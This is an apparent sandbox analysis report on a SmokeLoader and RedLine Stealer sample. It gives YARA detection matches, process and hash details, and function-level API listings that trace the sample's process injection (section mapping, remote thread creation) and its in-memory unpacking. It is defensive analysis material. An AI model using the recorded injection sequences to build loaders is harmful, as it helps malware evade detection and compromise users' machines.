                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 39%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:12:40:01
                                                      Start date:24/10/2024
                                                      Path:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\dvjdfvr
                                                      Imagebase:0x400000
                                                      File size:399'360 bytes
                                                      MD5 hash:BAB1912F10355B913050217669ACC322
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:8.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:37%
                                                        Total number of Nodes:108
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2838 620001 2839 620005 2838->2839 2844 62092b GetPEB 2839->2844 2841 620030 2846 62003c 2841->2846 2845 620972 2844->2845 2845->2841 2847 620049 2846->2847 2848 620e0f 2 API calls 2847->2848 2849 620223 2848->2849 2850 620d90 GetPEB 2849->2850 2851 620238 VirtualAlloc 2850->2851 2852 620265 2851->2852 2853 6202ce VirtualProtect 2852->2853 2855 62030b 2853->2855 2854 620439 VirtualFree 2858 6204be LoadLibraryA 2854->2858 2855->2854 2857 6208c7 2858->2857 2771 601226 2774 601237 2771->2774 2775 601246 2774->2775 2778 6019d7 2775->2778 2779 6019f2 2778->2779 2780 6019fb CreateToolhelp32Snapshot 2779->2780 2781 601a17 Module32First 2779->2781 2780->2779 2780->2781 2782 601a26 2781->2782 2783 601236 2781->2783 2785 601696 2782->2785 2786 6016c1 2785->2786 2787 6016d2 VirtualAlloc 2786->2787 2788 60170a 2786->2788 2787->2788 2859 620005 2860 62092b GetPEB 2859->2860 2861 620030 2860->2861 2862 62003c 7 API calls 2861->2862 2863 620038 2862->2863 2905 40198a 2906 4019a8 Sleep 2905->2906 2907 401207 2905->2907 2908 4019c3 2906->2908 2907->2906 2909 401583 7 API calls 2908->2909 2910 4019d4 2908->2910 2909->2910 2911 40158e 2912 4015bf 2911->2912 2913 401634 NtDuplicateObject 2912->2913 2921 401750 2912->2921 2914 401651 NtCreateSection 2913->2914 2913->2921 2915 4016d1 NtCreateSection 2914->2915 2916 401677 NtMapViewOfSection 2914->2916 2918 4016fd 2915->2918 2915->2921 2916->2915 2917 40169a NtMapViewOfSection 2916->2917 2917->2915 2919 4016b8 2917->2919 2920 401707 NtMapViewOfSection 2918->2920 2918->2921 2919->2915 2920->2921 2922 40172e NtMapViewOfSection 2920->2922 2922->2921 2830 402e50 2833 402e54 2830->2833 2831 402fa8 2832 401959 8 API calls 2832->2831 2833->2831 2833->2832 2880 401970 2881 401975 2880->2881 2882 4019a8 Sleep 2881->2882 2883 4019c3 2882->2883 2884 401583 7 API calls 2883->2884 2885 4019d4 2883->2885 2884->2885 2767 403054 2768 403197 2767->2768 2769 40307e 2767->2769 2769->2768 2770 403139 RtlCreateUserThread NtTerminateProcess 2769->2770 2770->2768 2789 402f17 2790 402f1c 2789->2790 2792 402fa8 2790->2792 2793 401959 2790->2793 2794 401968 2793->2794 2795 4019a8 Sleep 2794->2795 2796 4019c3 2795->2796 2798 4019d4 2796->2798 2799 401583 2796->2799 2798->2792 2800 401594 2799->2800 2801 401634 NtDuplicateObject 2800->2801 2803 401750 2800->2803 2802 401651 NtCreateSection 2801->2802 2801->2803 2804 4016d1 NtCreateSection 2802->2804 2805 401677 NtMapViewOfSection 2802->2805 2803->2798 2804->2803 2807 4016fd 2804->2807 2805->2804 2806 40169a NtMapViewOfSection 2805->2806 2806->2804 2808 4016b8 2806->2808 2807->2803 2809 401707 NtMapViewOfSection 2807->2809 2808->2804 2809->2803 2810 40172e NtMapViewOfSection 2809->2810 2810->2803 2892 401919 2893 401969 2892->2893 2895 40191d 2892->2895 2894 4019a8 Sleep 2893->2894 2896 4019c3 2894->2896 2897 401583 7 API calls 2896->2897 2898 4019d4 2896->2898 2897->2898 2811 62003c 2812 620049 2811->2812 2824 620e0f SetErrorMode SetErrorMode 2812->2824 2817 620265 2818 6202ce VirtualProtect 2817->2818 2820 62030b 2818->2820 2819 620439 VirtualFree 2823 6204be LoadLibraryA 2819->2823 2820->2819 2822 6208c7 2823->2822 2825 620223 2824->2825 2826 620d90 2825->2826 2827 620dad 2826->2827 2828 620dbb GetPEB 2827->2828 2829 620238 VirtualAlloc 2827->2829 2828->2829 2829->2817

                                                        Executed Functions

                                                        Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 106 401916-401956 call 401207 100->106 104 401605-40162e 101->104 105 401907 101->105 104->105 114 401634-40164b NtDuplicateObject 104->114 105->106 114->105 116 401651-401675 NtCreateSection 114->116 118 4016d1-4016f7 NtCreateSection 116->118 119 401677-401698 NtMapViewOfSection 116->119 118->105 121 4016fd-401701 118->121 119->118 120 40169a-4016b6 NtMapViewOfSection 119->120 120->118 123 4016b8-4016ce 120->123 121->105 124 401707-401728 NtMapViewOfSection 121->124 123->118 124->105 126 40172e-40174a NtMapViewOfSection 124->126 126->105 129 401750 126->129 129->105 131 401750 call 401755 129->131 131->105
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                        • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25
                                                        Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 147 401916-401956 call 401207 141->147 145 401605-40162e 142->145 146 401907 142->146 145->146 155 401634-40164b NtDuplicateObject 145->155 146->147 155->146 157 401651-401675 NtCreateSection 155->157 159 4016d1-4016f7 NtCreateSection 157->159 160 401677-401698 NtMapViewOfSection 157->160 159->146 162 4016fd-401701 159->162 160->159 161 40169a-4016b6 NtMapViewOfSection 160->161 161->159 164 4016b8-4016ce 161->164 162->146 165 401707-401728 NtMapViewOfSection 162->165 164->159 165->146 167 40172e-40174a NtMapViewOfSection 165->167 167->146 170 401750 167->170 170->146 172 401750 call 401755 170->172 172->146
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                        • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24
                                                        Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 185 401916-401956 call 401207 179->185 183 401605-40162e 180->183 184 401907 180->184 183->184 193 401634-40164b NtDuplicateObject 183->193 184->185 193->184 195 401651-401675 NtCreateSection 193->195 197 4016d1-4016f7 NtCreateSection 195->197 198 401677-401698 NtMapViewOfSection 195->198 197->184 200 4016fd-401701 197->200 198->197 199 40169a-4016b6 NtMapViewOfSection 198->199 199->197 202 4016b8-4016ce 199->202 200->184 203 401707-401728 NtMapViewOfSection 200->203 202->197 203->184 205 40172e-40174a NtMapViewOfSection 203->205 205->184 208 401750 205->208 208->184 210 401750 call 401755 208->210 210->184
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                        • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20
                                                        Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5
                                                        Function 006019D7 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 6019d7-6019f0 229 6019f2-6019f4 228->229 230 6019f6 229->230 231 6019fb-601a07 CreateToolhelp32Snapshot 229->231 230->231 232 601a17-601a24 Module32First 231->232 233 601a09-601a0f 231->233 234 601a26-601a27 call 601696 232->234 235 601a2d-601a35 232->235 233->232 238 601a11-601a15 233->238 239 601a2c 234->239 238->229 238->232 239->235
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006019FF
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00601A1F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 7069c18228d0ffb264b2c9333f6c58bf6fb7589aae838ab9b83557068d1c4ec7
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 15F0CD322403116BD7242BF9A88DBAB72E9AF4A720F100628F642A91C0DA70EC054A60
                                                        Function 0062003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 62003c-620047 1 620049 0->1 2 62004c-620263 call 620a3f call 620e0f call 620d90 VirtualAlloc 0->2 1->2 17 620265-620289 call 620a69 2->17 18 62028b-620292 2->18 23 6202ce-6203c2 VirtualProtect call 620cce call 620ce7 17->23 20 6202a1-6202b0 18->20 22 6202b2-6202cc 20->22 20->23 22->20 29 6203d1-6203e0 23->29 30 6203e2-620437 call 620ce7 29->30 31 620439-6204b8 VirtualFree 29->31 30->29 33 6205f4-6205fe 31->33 34 6204be-6204cd 31->34 37 620604-62060d 33->37 38 62077f-620789 33->38 36 6204d3-6204dd 34->36 36->33 40 6204e3-620505 36->40 37->38 43 620613-620637 37->43 41 6207a6-6207b0 38->41 42 62078b-6207a3 38->42 51 620517-620520 40->51 52 620507-620515 40->52 44 6207b6-6207cb 41->44 45 62086e-6208be LoadLibraryA 41->45 42->41 46 62063e-620648 43->46 48 6207d2-6207d5 44->48 50 6208c7-6208f9 45->50 46->38 49 62064e-62065a 46->49 53 6207d7-6207e0 48->53 54 620824-620833 48->54 49->38 55 620660-62066a 49->55 57 620902-62091d 50->57 58 6208fb-620901 50->58 59 620526-620547 51->59 52->59 60 6207e2 53->60 61 6207e4-620822 53->61 56 620839-62083c 54->56 62 62067a-620689 55->62 56->45 63 62083e-620847 56->63 58->57 66 62054d-620550 59->66 60->54 61->48 64 620750-62077a 62->64 65 62068f-6206b2 62->65 67 62084b-62086c 63->67 68 620849 63->68 64->46 69 6206b4-6206ed 65->69 70 6206ef-6206fc 65->70 72 6205e0-6205ef 66->72 73 620556-62056b 66->73 67->56 68->45 69->70 74 62074b 70->74 75 6206fe-620748 70->75 72->36 76 62056f-62057a 73->76 77 62056d 73->77 74->62 75->74 78 62059b-6205bb 76->78 79 62057c-620599 76->79 77->72 84 6205bd-6205db 78->84 79->84 84->66
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0062024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 42ec4702e70d4e90e99a8a4f860a1c510c2e99c0fd791167ea9c40f41969c617
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: FB526874A01229DFDB64CF58D985BA8BBB1BF09304F1480D9E94DAB352DB30AE85DF14
                                                        Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 620e0f-620e24 SetErrorMode * 2 242 620e26 241->242 243 620e2b-620e2c 241->243 242->243
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00620223,?,?), ref: 00620E19
                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00620223,?,?), ref: 00620E1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: ca7d39d3f00bb23aeb65542139c9111eb9232972a72a4ee517b453a7e7f206fa
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: FCD0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9581C770994046E5
                                                        Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                        • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F
                                                        Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                                        • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                                        • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF
                                                        Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                                        • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                                        • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B
                                                        Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                                        • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                                        • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B
                                                        Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
